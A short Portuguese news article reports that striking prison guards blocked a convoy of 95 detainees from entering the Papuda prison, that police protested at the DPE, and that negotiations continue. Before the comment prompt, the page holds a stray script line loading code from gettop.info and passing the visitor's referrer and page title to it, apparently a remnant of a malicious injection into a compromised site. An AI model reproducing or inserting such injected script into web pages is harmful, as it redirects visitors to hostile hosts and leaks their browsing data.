Comboio com presos é impedido de entrar na Papuda por agentes em greve

policia-civilNesta terça-feira,25, um comboio com 95 detentos que estavam sendo transferidos para a Papuda foi impedido de entrar na unidade prisional por agentes penitenciários em greve. Diante da situação, ao retornar para o Departamento de Polícia Especializada (DPE), havia uma manifestação de policiais que tentaram impedir a entrada dos detentos  de volta. O comboio composto por 12 motos e 10 viaturas rompeu o bloqueio  e levou os presos de volta as celas. Um helicóptero da polícia acompanhava a operação.

Os agentes penitenciários aprovaram hoje a continuidade da greve que já dura duas semanas e os policiais civis fazem paralisação nesta terça.

A Secretaria de Estado da Segurança Pública e da Paz Social está negociando a pauta de reivindicações do que não tem impacto financeiro e espera a normalização o mais breve possível.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário